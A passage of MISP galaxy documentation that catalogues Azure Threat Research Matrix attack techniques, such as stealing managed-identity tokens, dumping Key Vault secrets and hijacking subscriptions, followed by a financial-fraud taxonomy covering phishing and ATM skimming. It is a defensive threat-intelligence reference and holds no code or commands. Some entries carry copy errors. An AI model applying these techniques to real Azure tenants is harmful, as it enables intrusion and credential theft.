Table 502. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-2

AZT302.3 - Automation Account Runbook Managed Identity

By utilizing an Automation Account configured with a Managed Identity, an attacker can execute commands on an Azure VM via RunCommand (AZT301.1) if that service principal has the correct role and privileges.

The tag is: misp-galaxy:atrm="AZT302.3 - Automation Account Runbook Managed Identity"

Table 503. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-3

AZT302.4 - Function Application

By utilizing a Function Application, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT302.4 - Function Application"

Table 504. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-4

AZT303 - Managed Device Scripting

Adversaries may abuse access to any managed devices in AzureAD by executing PowerShell or Python scripts on them.

The tag is: misp-galaxy:atrm="AZT303 - Managed Device Scripting"

Table 505. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT303/AZT303

AZT401 - Privileged Identity Management Role

An adversary may escalate their privileges if their current account is eligible for role activation via Privileged Identity Management (PIM).

The tag is: misp-galaxy:atrm="AZT401 - Privileged Identity Management Role"

Table 506. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT401/AZT401

AZT402 - Elevated Access Toggle

An adversary may escalate their privileges from Azure AD to all Azure subscriptions in the tenant if they are a global administrator.

The tag is: misp-galaxy:atrm="AZT402 - Elevated Access Toggle"

Table 507. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT402/AZT402

AZT403 - Local Resource Hijack

By modifying the .bashrc file in a CloudShell .IMG file, an adversary may escalate their privileges by injecting commands that will add an arbitrary user account to a desired role and scope.

The tag is: misp-galaxy:atrm="AZT403 - Local Resource Hijack"

Table 508. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT403/AZT403-1

AZT404 - Principal Impersonation

Adversaries may abuse resources that are configured with a service principal or other identity to further their access to the current or other resources.

The tag is: misp-galaxy:atrm="AZT404 - Principal Impersonation"

Table 509. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404

AZT404.1 - Function Application

By utilizing a Function Application configured with a managed identity or other identity provider, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.1 - Function Application"

Table 510. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-1

AZT404.2 - Logic Application

By utilizing a Logic Application configured with a managed identity or other identity provider, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.2 - Logic Application"

Table 511. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-2

AZT404.3 - Automation Account

By utilizing a Function Application, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.3 - Automation Account"

Table 512. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-3

AZT404.4 - App Service

By utilizing an App Service configured with a managed identity or other identity provider, an attacker can execute Azure operations on a given resource.

The tag is: misp-galaxy:atrm="AZT404.4 - App Service"

Table 513. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT404/AZT404-4

AZT405 - Azure AD Application

Adversaries may abuse the assigned permissions on an Azure AD Application to escalate their privileges.

The tag is: misp-galaxy:atrm="AZT405 - Azure AD Application"

Table 514. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405

AZT405.1 - Application API Permissions

By compromising a user, a user in a group, or a service principal that has an application role over an application, an attacker may be able to escalate their privileges by impersonating the associated service principal and leveraging any privileged application role assigned to it.

The tag is: misp-galaxy:atrm="AZT405.1 - Application API Permissions"

Table 515. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405-1

AZT405.2 - Application Role

By compromising a service principal whose application has privileged API permissions, an attacker can escalate their privileges to a higher privileged role.

The tag is: misp-galaxy:atrm="AZT405.2 - Application Role"

Table 516. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405-2

AZT405.3 - Application Registration Owner

By compromising an account that is an 'Owner' of an application configured with additional roles or API permissions, an attacker can escalate their privileges by adding a certificate or credentials and logging in as the service principal.

The tag is: misp-galaxy:atrm="AZT405.3 - Application Registration Owner"

Table 517. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/PrivilegeEscalation/AZT405/AZT405-3

AZT501 - Account Manipulation

An adversary may manipulate an account to maintain access in an Azure tenant.

The tag is: misp-galaxy:atrm="AZT501 - Account Manipulation"

Table 518. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501

AZT501.1 - User Account Manipulation

An adversary may manipulate a user account to maintain access in an Azure tenant.

The tag is: misp-galaxy:atrm="AZT501.1 - User Account Manipulation"

Table 519. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501-1

AZT501.2 - Service Principal Manipulation

An adversary may manipulate a service principal to maintain access in an Azure tenant.

The tag is: misp-galaxy:atrm="AZT501.2 - Service Principal Manipulation"

Table 520. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501-2

AZT501.3 - Azure VM Local Administrator Manipulation

An adversary may manipulate the local admin account on an Azure VM.

The tag is: misp-galaxy:atrm="AZT501.3 - Azure VM Local Administrator Manipulation"

Table 521. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT501/AZT501-3

AZT502 - Account Creation

An adversary may create an account in Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT502 - Account Creation"

Table 522. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502

AZT502.1 - User Account Creation

An adversary may create an application & service principal in Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT502.1 - User Account Creation"

Table 523. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502-1

AZT502.2 - Service Principal Creation

An adversary may create an application & service principal in Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT502.2 - Service Principal Creation"

Table 524. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502-2

AZT502.3 - Guest Account Creation

An adversary may create a guest account in Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT502.3 - Guest Account Creation"

Table 525. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT502/AZT502-3

AZT503 - HTTP Trigger

Adversaries may configure a resource with an HTTP trigger to run commands without needing authentication.

The tag is: misp-galaxy:atrm="AZT503 - HTTP Trigger"

Table 526. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503

AZT503.1 - Logic Application HTTP Trigger

Adversaries may configure a Logic Application with a user account or managed identity and modify the HTTP trigger to run a command via HTTP request.

The tag is: misp-galaxy:atrm="AZT503.1 - Logic Application HTTP Trigger"

Table 527. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-1

AZT503.2 - Function App HTTP Trigger

Adversaries may configure a Function Application with a user account or managed identity and modify the HTTP trigger to run a command via HTTP request.

The tag is: misp-galaxy:atrm="AZT503.2 - Function App HTTP Trigger"

Table 528. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-2

AZT503.3 - Runbook Webhook

Adversaries may create a webhook to a Runbook which allows unauthenticated access into an Azure subscription or tenant.

The tag is: misp-galaxy:atrm="AZT503.3 - Runbook Webhook"

Table 529. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-3

AZT503.4 - WebJob

Adversaries may create a WebJob on an App Service, which allows arbitrary background tasks to be run on a set schedule.

The tag is: misp-galaxy:atrm="AZT503.4 - WebJob"

Table 530. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT503/AZT503-4

AZT504 - Watcher Tasks

By configuring a watcher task and a Runbook, an adversary can establish persistence by executing the Runbook on a triggered event.

The tag is: misp-galaxy:atrm="AZT504 - Watcher Tasks"

Table 531. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT504/AZT504

AZT505 - Scheduled Jobs

Adversaries may create a schedule for a Runbook to run at a defined interval.

The tag is: misp-galaxy:atrm="AZT505 - Scheduled Jobs"

Table 532. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT505/AZT505-1

AZT506 - Network Security Group Modification

Adversaries can modify the rules in a Network Security Group to establish access over additional ports.

The tag is: misp-galaxy:atrm="AZT506 - Network Security Group Modification"

Table 533. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT506/AZT506

AZT507 - External Entity Access

Adversaries may configure the target Azure tenant to be managed by another, external tenant, or its users.

The tag is: misp-galaxy:atrm="AZT507 - External Entity Access"

Table 534. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507

AZT507.1 - Azure Lighthouse

Adversaries may utilize Azure Lighthouse to manage the target tenant from an external tenant.

The tag is: misp-galaxy:atrm="AZT507.1 - Azure Lighthouse"

Table 535. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-1

AZT507.2 - Microsoft Partners

Adversaries may use Delegated Administrative Privileges to give themselves administrator access to the target tenant.

The tag is: misp-galaxy:atrm="AZT507.2 - Microsoft Partners"

Table 536. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-2

AZT507.3 - Subscription Hijack

An adversary may transfer a subscription from a target tenant to an attacker-controlled tenant. This retains the billing account set up by the target, and the target tenant administrators will no longer have control over the subscription.

The tag is: misp-galaxy:atrm="AZT507.3 - Subscription Hijack"

Table 537. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-3

AZT507.4 - Domain Trust Modification

An adversary may add an additional identity provider or domain to maintain a backdoor into the tenant.

The tag is: misp-galaxy:atrm="AZT507.4 - Domain Trust Modification"

Table 538. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT507/AZT507-4

AZT508 - Azure Policy

By configuring a policy with the 'DeployIfNotExists' definition, an adversary may establish persistence by creating a backdoor when the policy is triggered.

The tag is: misp-galaxy:atrm="AZT508 - Azure Policy"

Table 539. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Persistence/AZT508/AZT508

AZT601 - Steal Managed Identity JsonWebToken

An adversary may utilize the resource’s functionality to obtain a JWT for the applied Managed Identity Service Principal account.

The tag is: misp-galaxy:atrm="AZT601 - Steal Managed Identity JsonWebToken"

Table 540. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601

AZT601.1 - Virtual Machine IMDS Request

By utilizing access to IMDS, an attacker can request a JWT for a Managed Identity on an Azure VM if they have access to execute commands on the system.

The tag is: misp-galaxy:atrm="AZT601.1 - Virtual Machine IMDS Request"

Table 541. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-1

AZT601.2 - Azure Kubernetes Service IMDS Request

By utilizing access to IMDS, an attacker can request a JWT for a Managed Identity on an AKS Cluster if they have access to execute commands on the system.

The tag is: misp-galaxy:atrm="AZT601.2 - Azure Kubernetes Service IMDS Request"

Table 542. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-2

AZT601.3 - Logic Application JWT PUT Request

If a Logic App is using a Managed Identity, an adversary can modify the logic to make an HTTP POST request to reveal the Managed Identity’s JWT.

The tag is: misp-galaxy:atrm="AZT601.3 - Logic Application JWT PUT Request"

Table 543. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-3

AZT601.4 - Function Application JWT GET Request

If a Function App is using a Managed Identity, an adversary can modify the logic to respond to an HTTP GET request by revealing the Managed Identity’s JWT.

The tag is: misp-galaxy:atrm="AZT601.4 - Function Application JWT GET Request"

Table 544. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-4

AZT601.5 - Automation Account Runbook

If an Automation Account is using a Managed Identity, an adversary can create a Runbook to request the Managed Identity’s JWT.

The tag is: misp-galaxy:atrm="AZT601.5 - Automation Account Runbook"

Table 545. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT601/AZT601-5

AZT602 - Steal Service Principal Certificate

If a Runbook is utilizing a 'RunAs' account, then an adversary may manipulate the Runbook to reveal the certificate the Service Principal is using for authentication.

The tag is: misp-galaxy:atrm="AZT602 - Steal Service Principal Certificate"

Table 546. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT602/AZT602-1

AZT603 - Service Principal Secret Reveal

If a Function App is using a service principal for authentication, an adversary may manipulate the function app logic to reveal the service principal’s secret in plain text.

The tag is: misp-galaxy:atrm="AZT603 - Service Principal Secret Reveal"

Table 547. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT603/AZT603-1

AZT604 - Azure KeyVault Dumping

An adversary may access an Azure KeyVault in an attempt to view secrets, certificates, or keys.

The tag is: misp-galaxy:atrm="AZT604 - Azure KeyVault Dumping"

Table 548. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604

AZT604.1 - Azure KeyVault Secret Dump

By accessing an Azure Key Vault, an adversary may dump any or all secrets.

The tag is: misp-galaxy:atrm="AZT604.1 - Azure KeyVault Secret Dump"

Table 549. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604-1

AZT604.2 - Azure KeyVault Certificate Dump

By accessing an Azure Key Vault, an adversary may dump any or all certificates.

The tag is: misp-galaxy:atrm="AZT604.2 - Azure KeyVault Certificate Dump"

Table 550. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604-2

AZT604.3 - Azure KeyVault Key Dump

By accessing an Azure Key Vault, an adversary may dump any or all public keys. Note that private keys cannot be retrieved.

The tag is: misp-galaxy:atrm="AZT604.3 - Azure KeyVault Key Dump"

Table 551. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT604/AZT604-3

AZT605 - Resource Secret Reveal

An adversary may access an Azure KeyVault in an attempt to view secrets, certificates, or keys.

The tag is: misp-galaxy:atrm="AZT605 - Resource Secret Reveal"

Table 552. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605

AZT605.1 - Storage Account Access Key Dumping

By accessing a Storage Account, an adversary may dump access keys pertaining to the Storage Account, which will give them full access to the Storage Account.

The tag is: misp-galaxy:atrm="AZT605.1 - Storage Account Access Key Dumping"

Table 553. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605-1

AZT605.2 - Automation Account Credential Secret Dump

By editing a Runbook, a credential configured in an Automation Account may be revealed.

The tag is: misp-galaxy:atrm="AZT605.2 - Automation Account Credential Secret Dump"

Table 554. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605-2

AZT605.3 - Resource Group Deployment History Secret Dump

By accessing deployment history of a Resource Group, secrets used in the ARM template may be revealed.

The tag is: misp-galaxy:atrm="AZT605.3 - Resource Group Deployment History Secret Dump"

Table 555. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/CredentialAccess/AZT605/AZT605-3

AZT701 - SAS URI Generation

By generating an SAS URI for a resource, an adversary may extract the contents of that resource without authentication at any time.

The tag is: misp-galaxy:atrm="AZT701 - SAS URI Generation"

Table 556. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT701/AZT701

AZT701.1 - VM Disk SAS URI

An adversary may create an SAS URI to download the disk attached to a virtual machine.

The tag is: misp-galaxy:atrm="AZT701.1 - VM Disk SAS URI"

Table 557. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT701/AZT701-1

AZT701.2 - Storage Account File Share SAS

By generating a Shared Access Signature (SAS) URI, an adversary can access a container in a Storage Account at any time.

The tag is: misp-galaxy:atrm="AZT701.2 - Storage Account File Share SAS"

Table 558. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT701/AZT701-2

AZT702 - File Share Mounting

An adversary can generate a connection string to mount an Azure Storage Account File Share as an NFS or SMB share to their local machine.

The tag is: misp-galaxy:atrm="AZT702 - File Share Mounting"

Table 559. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT702/AZT702-1

AZT703 - Replication

The tag is: misp-galaxy:atrm="AZT703 - Replication"

Table 560. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT703/AZT703-1

AZT704 - Soft-Delete Recovery

An adversary may leverage resources found in a 'soft deletion' state, restore them and advance their attack by retrieving contents meant to be deleted.

The tag is: misp-galaxy:atrm="AZT704 - Soft-Delete Recovery"

Table 561. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704

AZT704.1 - Key Vault

An adversary may recover a key vault object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT704.1 - Key Vault"

Table 562. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-1

AZT704.2 - Storage Account Object

An adversary may recover a storage account object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT704.2 - Storage Account Object"

Table 563. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-2

AZT704.3 - Recovery Services Vault

An adversary may recover a virtual machine object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT704.3 - Recovery Services Vault"

Table 564. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-3

AZT705 - Azure Backup Delete

An adversary may recover a virtual machine object found in a 'soft deletion' state.

The tag is: misp-galaxy:atrm="AZT705 - Azure Backup Delete"

Table 565. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Impact/AZT704/AZT704-3

attck4fraud

attck4fraud - Principles of MITRE ATT&CK in the fraud domain.

attck4fraud is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Francesco Bigarella - Christophe Vandeplas

Phishing

In the context of ATT&CK for Fraud, phishing is described as the sending of fraudulent emails to a large audience in order to obtain sensitive information (PII, credentials, payment information). Phishing is never targeted to a specific individual or organisation. Phishing tries to create a sense of urgency or curiosity in order to capture the victim.

The tag is: misp-galaxy:financial-fraud="Phishing"

Table 566. Table References

Links

https://blog.malwarebytes.com/cybercrime/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/

https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Spear phishing

Spear phishing is the use of targeted emails to gain the trust of the target with the goal of committing fraud. Spear phishing messages are generally specific to the target and show an understanding of the target’s organisation structure, supply chain or business.

The tag is: misp-galaxy:financial-fraud="Spear phishing"

Spear phishing is also known as:

  • Spear-phishing

Table 567. Table References

Links

http://fortune.com/2017/04/27/facebook-google-rimasauskas/

https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM skimming

ATM Skimming refers to the act of capturing the data stored on a bank card (tracks) and the Personal Identification Number (PIN) associated with that card. Upon obtaining the data, the criminal proceeds to encode the same information into a new card and use it in combination with the PIN to perform illicit cash withdrawals. ATM Skimming is often achieved with a combination of a skimmer device for the card and a camera to capture the PIN.

The tag is: misp-galaxy:financial-fraud="ATM skimming"

ATM skimming is also known as:

  • Skimming - CPP ATM

Table 568. Table References

Links

https://krebsonsecurity.com/2015/07/spike-in-atm-skimming-in-mexico/

https://krebsonsecurity.com/2011/12/pro-grade-3d-printer-made-atm-skimmer/

https://krebsonsecurity.com/2017/08/dumping-data-from-deep-insert-skimmers/

https://krebsonsecurity.com/2016/06/atm-insert-skimmers-in-action/

https://krebsonsecurity.com/2014/11/skimmer-innovation-wiretapping-atms/

https://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/

https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green

https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM cash trapping

Trapping the cash dispenser with a physical component. Type 1 devices are visible to the user and type 2 devices are hidden inside the cash dispenser.

The tag is: misp-galaxy:financial-fraud="ATM cash trapping"

ATM cash trapping is also known as:

  • Cash Trapping

Table 569. Table References

Links

https://medium.com/@netsentries/beware-of-atm-cash-trapping-9421e498dfcf

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM Shimming

ATM Shimming refers to the act of capturing bank card data by accessing the EMV chip installed on the card while the card is presented to an ATM. Due to their low profile, shimmers can be fitted inside ATM card readers and are therefore more difficult to detect.

The tag is: misp-galaxy:financial-fraud="ATM Shimming"

Table 570. Table References

Links

https://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/

https://www.cbc.ca/news/canada/british-columbia/shimmers-criminal-chip-card-reader-fraud-1.3953438

https://krebsonsecurity.com/2017/01/atm-shimmers-target-chip-based-cards/

https://blog.dieboldnixdorf.com/atm-security-skimming-vs-shimming/

Vishing

Vishing, also known as voice phishing, is the criminal practice of using social engineering over the telephone system to gain access to private personal and financial information from the public for the purpose of financial reward. It is also employed by attackers for reconnaissance purposes to gather more detailed intelligence on a target organisation.

The tag is: misp-galaxy:financial-fraud="Vishing"

Table 571. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

POS Skimming

CPP analysis identifies the likely merchant, POS or ATM location from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.

The tag is: misp-galaxy:financial-fraud="POS Skimming"

POS Skimming is also known as:

  • Skimming - CPP POS

Table 572. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Social Media Scams

Social Media Scams

The tag is: misp-galaxy:financial-fraud="Social Media Scams"

Malware

Software which is specifically designed to disrupt, damage, or gain unauthorised access to a computer system.

The tag is: misp-galaxy:financial-fraud="Malware"

Table 573. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Account-Checking Services

Account-Checking Services

The tag is: misp-galaxy:financial-fraud="Account-Checking Services"

ATM Black Box Attack

Type of Jackpotting attack. Connection of an unauthorized device which sends dispense commands directly to the ATM cash dispenser in order to “cash out” the ATM.

The tag is: misp-galaxy:financial-fraud="ATM Black Box Attack"

ATM Black Box Attack is also known as:

  • Black Box Attack

Table 574. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Insider Trading

Insider Trading

The tag is: misp-galaxy:financial-fraud="Insider Trading"

Investment Fraud

A deceptive practice in the stock or commodities markets that induces investors to make purchase or sale decisions on the basis of false information, frequently resulting in losses, in violation of securities laws.

The tag is: misp-galaxy:financial-fraud="Investment Fraud"

Table 575. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Romance Scam

Romance scam is a confidence trick involving feigning romantic intentions towards a victim, gaining their affection, and then using that goodwill to commit fraud. Fraudulent acts may involve access to the victim’s money, bank accounts, credit cards, passports, e-mail accounts, or national identification numbers; or forcing the victims to commit financial fraud on their behalf.

The tag is: misp-galaxy:financial-fraud="Romance Scam"

Romance Scam is also known as:

  • Romance Fraud

Table 576. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Buying/Renting Fraud

Buying/Renting Fraud

The tag is: misp-galaxy:financial-fraud="Buying/Renting Fraud"

Cash Recovery Scam

Cash Recovery Scam

The tag is: misp-galaxy:financial-fraud="Cash Recovery Scam"

Fake Invoice Fraud

Invoice fraud happens when a company or organisation is tricked into changing bank account payee details for a payment. Criminals pose as regular suppliers to the company or organisation and will make a formal request for bank account details to be changed or emit false invoices.

The tag is: misp-galaxy:financial-fraud="Fake Invoice Fraud"

Fake Invoice Fraud is also known as:

  • Invoice Fraud

Table 577. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Business Email Compromise

Business Email Compromise

The tag is: misp-galaxy:financial-fraud="Business Email Compromise"

Scam

Scam

The tag is: misp-galaxy:financial-fraud="Scam"

CxO Fraud

CxO Fraud

The tag is: misp-galaxy:financial-fraud="CxO Fraud"

Compromised Payment Cards

The loss or theft of a card, which is subsequently used for illegal purposes until blocked by the card issuer.

The tag is: misp-galaxy:financial-fraud="Compromised Payment Cards"

Compromised Payment Cards is also known as:

  • Lost/Stolen Card

Table 578. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Compromised Account Credentials

Account takeover fraud is a form of identity theft in which the fraudster gets access to a victim’s bank or credit card accounts — through a data breach, malware or phishing — and uses them to make unauthorised transactions.

The tag is: misp-galaxy:financial-fraud="Compromised Account Credentials"

Compromised Account Credentials is also known as:

  • Account Takeover Fraud

Table 579. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Compromised Personally Identifiable Information (PII)

Compromised Personally Identifiable Information (PII)

The tag is: misp-galaxy:financial-fraud="Compromised Personally Identifiable Information (PII)"

Compromised Intellectual Property (IP)

Compromised Intellectual Property (IP)

The tag is: misp-galaxy:financial-fraud="Compromised Intellectual Property (IP)"

SWIFT Transaction

SWIFT Transaction

The tag is: misp-galaxy:financial-fraud="SWIFT Transaction"

Fund Transfer

Fund Transfer

The tag is: misp-galaxy:financial-fraud="Fund Transfer"

Cryptocurrency Exchange

Cryptocurrency Exchange

The tag is: misp-galaxy:financial-fraud="Cryptocurrency Exchange"

ATM Jackpotting

ATM Jackpotting

The tag is: misp-galaxy:financial-fraud="ATM Jackpotting"

Money Mules

Money Mules

The tag is: misp-galaxy:financial-fraud="Money Mules"

Prepaid Cards

Prepaid Cards

The tag is: misp-galaxy:financial-fraud="Prepaid Cards"

Resell Stolen Data

Resell Stolen Data

The tag is: misp-galaxy:financial-fraud="Resell Stolen Data"

ATM Explosive Attack

ATM Explosive Attack

The tag is: misp-galaxy:financial-fraud="ATM Explosive Attack"

CNP – Card Not Present

A card not present transaction (CNP, MO/TO, Mail Order / Telephone Order, MOTOEC) is a payment card transaction made where the cardholder does not or cannot physically present the card for a merchant’s visual examination at the time that an order is given and payment effected.

The tag is: misp-galaxy:financial-fraud="CNP – Card Not Present"

Table 580. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

CP – Card Present

A card present transaction occurs when a cardholder physically presents a card to request and authorise a financial transaction.

The tag is: misp-galaxy:financial-fraud="CP – Card Present"

Table 581. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Merchant Fraud

Fraud that occurs when a merchant account is used without the intention of operating a legitimate business transaction.

The tag is: misp-galaxy:financial-fraud="Merchant Fraud"

Table 582. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Virtual Currency Fraud

Fraud that involves virtual currency, or virtual money, which is a type of unregulated, digital money, issued and usually controlled by its developers and used and accepted among the members of a specific virtual community.

The tag is: misp-galaxy:financial-fraud="Virtual Currency Fraud"

Table 583. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Cheque Fraud

A category of criminal acts that involve making unlawful use of cheques in order to illegally acquire or borrow funds that do not exist within the account balance or account-holder’s legal ownership. Most methods involve taking advantage of the time between the negotiation of the cheque and its clearance at the cheque writer’s financial institution to draw out these funds.

The tag is: misp-galaxy:financial-fraud="Cheque Fraud"

Table 584. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Digital Fraud

Fraud perpetrated via omni-channel means against digital banking or payment channels such as home banking or other electronic services.

The tag is: misp-galaxy:financial-fraud="Digital Fraud"

Table 585. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Mobile Fraud

Fraud perpetrated via mobile devices against digital banking or payment channels such as home banking or other electronic services, or against online merchants.

The tag is: misp-galaxy:financial-fraud="Mobile Fraud"

Table 586. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Telephone Fraud

Fraud perpetrated via land line telephone means against banking or payment channels such as home banking or other electronic services, or against merchants.

The tag is: misp-galaxy:financial-fraud="Telephone Fraud"

Table 587. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Standing Order Fraud

A standing order is an automated method of making payments, where a person or business instructs their bank to pay another person or business a fixed amount of money at regular intervals. Fraud occurs when a standing order is falsely created or adulterated.

The tag is: misp-galaxy:financial-fraud="Standing Order Fraud"

Table 588. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

CEO/BEC Fraud

A scam in which cybercriminals spoof company email accounts and impersonate executives to try and fool an employee in accounting or HR into executing unauthorized wire transfers, or sending out confidential information.

The tag is: misp-galaxy:financial-fraud="CEO/BEC Fraud"

Table 589. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Money laundering

